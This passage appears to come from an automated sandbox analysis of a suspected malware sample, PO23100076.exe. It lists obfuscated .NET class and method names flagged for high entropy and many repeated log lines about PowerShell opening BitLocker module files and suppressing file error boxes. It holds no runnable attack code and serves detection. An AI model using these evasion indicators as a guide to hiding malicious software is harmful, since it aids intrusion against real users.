                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, l7TPuXzT2P3nv8FM1V.csHigh entropy of concatenated method names: 'kGbKc629mX', 'qkuKvDqFPI', 'BlDKr49lD1', 'hJUKGeBRpg', 'p7KK06lq7X', 'Er5KpVWZMq', 'rdkK1ZXfHU', 'NhoKSqeimt', 'XuLK7xKcpT', 'AHqKLxYKQa'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, DHn0pAxRfY5iM001up.csHigh entropy of concatenated method names: 'MMJCtteQjL', 'VvZC5rNfpr', 'frtCiIrCxm', 'sWuCJKUKrO', 'ipbCWNIXLq', 'ISwCaJbZNy', 'tOtjQEHx4eBJysrF1G', 'hTra5pOEWBAF0erxRT', 'HbxCC3MIGl', 'AxaCo1NcSD'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, JghurICx95AZThPieyV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PM0IVAe1ji', 'sFkIKoGJo7', 'N4UIDdlqCP', 'mfmIIJgY4o', 'TEPINM0OkK', 'pfQIsrkSlJ', 'DHGIShEtIP'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, IjN6U8h6ik7gwp5fxi.csHigh entropy of concatenated method names: 'a56MiUBNCG', 'g0uMJQhnxH', 'ToString', 'bKUM2lUZa3', 'do1MF3gMTY', 'TmUMy4chp6', 'd9SMBEVUl1', 'rJqMY7bYHv', 'vW7Mtc0noI', 'UGTM5SkuvK'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, nteQjLvwvZrNfpr2GT.csHigh entropy of concatenated method names: 'vyoFRgk3be', 'TxWFOtFy9Q', 'xTJFmkIckp', 'nTLFhTxt7g', 'vgNFH1CG5n', 'OG1FUijmCh', 'riKFwMaDJN', 'tjdFQXiJpg', 't94F4LZual', 'gomF8y1DKR'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, onb6LVFFkGrpv92kaT.csHigh entropy of concatenated method names: 'Dispose', 'g0XC4dpnNc', 'P3kX0QAXjA', 'ns0LB8qdwM', 'hDgC8w5WNl', 'i4rCzwGApa', 'ProcessDialogKey', 'XP6XEK7U2Q', 'WKPXCNYjJF', 'JQRXXP3XNg'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, mM9P1RCCZ9rkP3k0n1I.csHigh entropy of concatenated method names: 'W9MK8SftDD', 'kajKzlpR9p', 'FJBDE765hM', 'luFDCm0C6I', 'jeCDXWvr1X', 'VYbDoEtclU', 'nCuDxKYqd9', 'rmuDgqLY8x', 'qyqD2ADj3A', 'JGlDFWaAkx'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, UO5h42bOq9LPxoLKQg.csHigh entropy of concatenated method names: 'YYFfvZbNO9', 'siofrpRN0L', 'TUffGoMC3r', 'PYtf00hj12', 'NFbfpO2GnB', 'Kg8f1GOtrf', 'INtfPxRRGQ', 'ADVfkhS8o9', 'UjwfuHLbrt', 'KK1fe8xYbg'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, UKrOAFqUWfor9BpbNI.csHigh entropy of concatenated method names: 'vePB3DxaYQ', 'qbPBngohTI', 'yNnylqr6ge', 'NmdypPnTug', 's78y1D92ov', 'pNYy6hBOtl', 'fj5yPmAo5Z', 'ewmykCRAel', 'FIryTSVhVi', 'hyRyuHLLkZ'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, cLqpSwGJbZNyy3VoUb.csHigh entropy of concatenated method names: 'GDMYg3d8yF', 'GrKYFcSuNC', 'eKiYBNoI3s', 'IDiYt51gLY', 'DvqY5ASca4', 'TGoBHCEa3l', 'N0yBUTOnNV', 'XitBwCIkxF', 'mvHBQFIgJ8', 'kp9B49fONO'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, rrrdeAU4ChMt9kB3np.csHigh entropy of concatenated method names: 'NVmMQAfIKd', 'lxJM8SMQY6', 'mHR9EjeBS2', 'lVO9C3in6u', 'Hr2MekXl0y', 'KN2MdTDCPA', 'yclMbTJQeu', 'WE8MRxiDda', 'AaLMOkLvPT', 'TD8Mm56xRf'
                      Source: 0.2.PO23100076.exe.3864768.2.raw.unpack, yr8UpyTtDZyrCyhLOq.csHigh entropy of concatenated method names: 'PqMt7EGEyv', 'YECtLRh9G9', 'cIYtjooILh', 'cLQtAiKHLS', 'ROtt3ThDDK', 'Fbitc9386d', 'nF4tnia7H6', 'LVqtvtrj8p', 'BiUtrbqPN1', 'P1xtqbWgsx'
                      Source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, DlRvq5yJkomY4LIf3S.csHigh entropy of concatenated method names: 'kZ9YdQeiiHN6iHHplRr', 'wEfHEVeR3qXSbOkcscO', 'RLbYs7foSU', 'PW2e71euAk0VMGlpcQV', 'gjVptie4PJx3mKSamWn', 'LKcyQ4eq4Fn8S34m92l', 'RgtTUJcyZL', 'TBNYf2t1gt', 'NdiYZfNUem', 'u6GYH5kC76'
                      Source: 0.2.PO23100076.exe.67b0000.3.raw.unpack, vH9V9oD7tIKkmfHnnj.csHigh entropy of concatenated method names: 'CO1Gqr7JX', 'O7OmLZJsW', 'AEjTXD5ed', 'DjTcZUKVY', 'V5WOgiNs3', 'ri688DDjg', 'pN9ncriqM', 'x0i4vkLXV', 'aFLjtabv9', 'zVDpUJsTO'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, noPojjR9Pn5xTJrT9R.csHigh entropy of concatenated method names: 'JLWWudGB1e', 'sTeWdncUnC', 'WxQWRgxTq9', 'Cf6WO9NhvJ', 'dPpW0nS4Dk', 'M5ZWldUVNO', 'V1DWpG9bAF', 'sYhW1mBRem', 'zU4W6w5S1F', 'EooWPmSjSl'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, kV0lI2rrtIrCxmKWuK.csHigh entropy of concatenated method names: 'HJryAVM8Nv', 's6DycCk2Jl', 'UByyvp6TDq', 'DefyrDl00H', 'WKJyWXRsdf', 'CREyanhe3p', 't0xyMGhHTD', 'IRIy9F6mfS', 'VwByVFn30E', 'Y1WyKchxqA'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, aOw9dL5yUKMCSOO6YU.csHigh entropy of concatenated method names: 'CtfogPOuIl', 'Kgbo2hVwmc', 'ppNoFZATM3', 'gEnoyqwEHj', 'rdhoB30ZJv', 'xmUoYYkdrb', 'MZwotLZWZT', 'GJro586mRi', 'xKDoZ1mhXJ', 'GjEoiFSyCP'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, qfXQtGmpukQKEpK3iy.csHigh entropy of concatenated method names: 'ToString', 'QEsaeniyil', 'Hqma0Y9Oo2', 'qLsaldZAON', 'qUdapcIAih', 'ADfa17pFFv', 'svea6dPGID', 'HGKaPeeL4Z', 'u2nakjbrLJ', 'rf2aTifW6a'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, fTiLHoCEAqncxaWftsR.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'enFKeG5OAY', 'kKaKdFJWGB', 'a7jKbkX3qj', 'GW5KR0CnC1', 'tRUKOfpRjy', 'fnSKmSr0hU', 'V65Khr4yE7'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, zWtfYdXOcyqZfalbPR.csHigh entropy of concatenated method names: 'IGNjPLyC4', 'v3dACNbf5', 'IojcAeTeQ', 'UZsnKZ5In', 'pg1rp37OA', 'Qfaqo13qC', 'p1vdLrKiO9xD1yZreq', 'sBShIOC23VmvWpuD5K', 'Rn09lPxHU', 'cQCKvAsqJ'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, yXVWjkwhVF0XdpnNcy.csHigh entropy of concatenated method names: 'rbuVWs0MPQ', 'nU2VM00faf', 'FVUVVcjtdB', 'IchVDF4JJy', 'pJ3VNRsG7l', 'ym7VSpXf7R', 'Dispose', 'BfQ929angQ', 'WJp9FTt8LM', 'war9y8qrUQ'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, L3XNgB8WxtdAWbUg1Q.csHigh entropy of concatenated method names: 'UufKylBB76', 'F31KB7UEEb', 'i7iKYpA7A5', 'ubOKtBOEqF', 'gWJKVdp4aW', 'em2K5mp7mU', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, KK7U2Q4QKPNYjJF1QR.csHigh entropy of concatenated method names: 'CtrVG7ffEH', 'S5RV0UQrWU', 'r0OVlsTjVf', 'JwHVpW6DoP', 'AWhV1GaSfF', 'aV4V6PMvTU', 'vjuVP3JNLW', 'wMFVkWdYAy', 'p8BVT69x04', 'baNVuMNM5y'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, QD4VtECoFGKpc26yn8V.csHigh entropy of concatenated method names: 'OPND8ADHGo', 'nMpDzhnwGk', 'J6mIEHYbyW', 'LsFrJ1Nn1UdvpfdQSw7', 'ClK9SNNzaCpfy8pDEJ1', 'x9aLnvXkq3SB2bMcsdE', 'ODACQYXrpa56V2Cqlsf'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, l7TPuXzT2P3nv8FM1V.csHigh entropy of concatenated method names: 'kGbKc629mX', 'qkuKvDqFPI', 'BlDKr49lD1', 'hJUKGeBRpg', 'p7KK06lq7X', 'Er5KpVWZMq', 'rdkK1ZXfHU', 'NhoKSqeimt', 'XuLK7xKcpT', 'AHqKLxYKQa'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, DHn0pAxRfY5iM001up.csHigh entropy of concatenated method names: 'MMJCtteQjL', 'VvZC5rNfpr', 'frtCiIrCxm', 'sWuCJKUKrO', 'ipbCWNIXLq', 'ISwCaJbZNy', 'tOtjQEHx4eBJysrF1G', 'hTra5pOEWBAF0erxRT', 'HbxCC3MIGl', 'AxaCo1NcSD'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, JghurICx95AZThPieyV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PM0IVAe1ji', 'sFkIKoGJo7', 'N4UIDdlqCP', 'mfmIIJgY4o', 'TEPINM0OkK', 'pfQIsrkSlJ', 'DHGIShEtIP'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, IjN6U8h6ik7gwp5fxi.csHigh entropy of concatenated method names: 'a56MiUBNCG', 'g0uMJQhnxH', 'ToString', 'bKUM2lUZa3', 'do1MF3gMTY', 'TmUMy4chp6', 'd9SMBEVUl1', 'rJqMY7bYHv', 'vW7Mtc0noI', 'UGTM5SkuvK'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, nteQjLvwvZrNfpr2GT.csHigh entropy of concatenated method names: 'vyoFRgk3be', 'TxWFOtFy9Q', 'xTJFmkIckp', 'nTLFhTxt7g', 'vgNFH1CG5n', 'OG1FUijmCh', 'riKFwMaDJN', 'tjdFQXiJpg', 't94F4LZual', 'gomF8y1DKR'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, onb6LVFFkGrpv92kaT.csHigh entropy of concatenated method names: 'Dispose', 'g0XC4dpnNc', 'P3kX0QAXjA', 'ns0LB8qdwM', 'hDgC8w5WNl', 'i4rCzwGApa', 'ProcessDialogKey', 'XP6XEK7U2Q', 'WKPXCNYjJF', 'JQRXXP3XNg'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, mM9P1RCCZ9rkP3k0n1I.csHigh entropy of concatenated method names: 'W9MK8SftDD', 'kajKzlpR9p', 'FJBDE765hM', 'luFDCm0C6I', 'jeCDXWvr1X', 'VYbDoEtclU', 'nCuDxKYqd9', 'rmuDgqLY8x', 'qyqD2ADj3A', 'JGlDFWaAkx'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, UO5h42bOq9LPxoLKQg.csHigh entropy of concatenated method names: 'YYFfvZbNO9', 'siofrpRN0L', 'TUffGoMC3r', 'PYtf00hj12', 'NFbfpO2GnB', 'Kg8f1GOtrf', 'INtfPxRRGQ', 'ADVfkhS8o9', 'UjwfuHLbrt', 'KK1fe8xYbg'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, UKrOAFqUWfor9BpbNI.csHigh entropy of concatenated method names: 'vePB3DxaYQ', 'qbPBngohTI', 'yNnylqr6ge', 'NmdypPnTug', 's78y1D92ov', 'pNYy6hBOtl', 'fj5yPmAo5Z', 'ewmykCRAel', 'FIryTSVhVi', 'hyRyuHLLkZ'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, cLqpSwGJbZNyy3VoUb.csHigh entropy of concatenated method names: 'GDMYg3d8yF', 'GrKYFcSuNC', 'eKiYBNoI3s', 'IDiYt51gLY', 'DvqY5ASca4', 'TGoBHCEa3l', 'N0yBUTOnNV', 'XitBwCIkxF', 'mvHBQFIgJ8', 'kp9B49fONO'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, rrrdeAU4ChMt9kB3np.csHigh entropy of concatenated method names: 'NVmMQAfIKd', 'lxJM8SMQY6', 'mHR9EjeBS2', 'lVO9C3in6u', 'Hr2MekXl0y', 'KN2MdTDCPA', 'yclMbTJQeu', 'WE8MRxiDda', 'AaLMOkLvPT', 'TD8Mm56xRf'
                      Source: 0.2.PO23100076.exe.6c20000.4.raw.unpack, yr8UpyTtDZyrCyhLOq.csHigh entropy of concatenated method names: 'PqMt7EGEyv', 'YECtLRh9G9', 'cIYtjooILh', 'cLQtAiKHLS', 'ROtt3ThDDK', 'Fbitc9386d', 'nF4tnia7H6', 'LVqtvtrj8p', 'BiUtrbqPN1', 'P1xtqbWgsx'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\PO23100076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
